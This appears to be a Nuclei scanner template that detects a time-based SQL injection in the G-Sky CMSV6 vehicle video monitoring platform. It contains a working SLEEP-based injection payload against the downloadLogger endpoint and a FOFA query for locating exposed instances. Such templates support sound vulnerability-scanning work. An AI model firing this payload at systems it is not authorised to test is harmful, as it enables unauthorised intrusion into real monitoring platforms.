id: gsky-cmsv6-edu-security-officer-sqli
info:
  name: 通天星 CMSV6 车载视频监控平台 disable - sqli
  author: leadlife
  severity: high
  description: 通天星 CMSV6 车载定位监控平台 disable SQL 注入漏洞
  reference: 
    - https://mp.weixin.qq.com/s?__biz=Mzg4Njg3MDk5Ng==&mid=2247486671&idx=1&sn=a8cac0ea09f0581677017806c07be7b2
    - https://github.com/wy876/wiki/blob/main/%E9%80%9A%E5%A4%A9%E6%98%9FCMSV6%E8%BD%A6%E8%BD%BD%E8%A7%86%E9%A2%91%E7%9B%91%E6%8E%A7%E5%B9%B3%E5%8F%B0disable%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5.md
  metadata:
    verified: true
    fofa-query: body="./open/webApi.html"||body="/808gps/"
  tags: g-sky,sqli,time

http:
  - raw:
      - |+
        @timeout: 15s
        GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - duration >= 5 && duration < 9
          - status_code == 200
          - contains_all(body,'pagination','infos','resMap')
        condition: and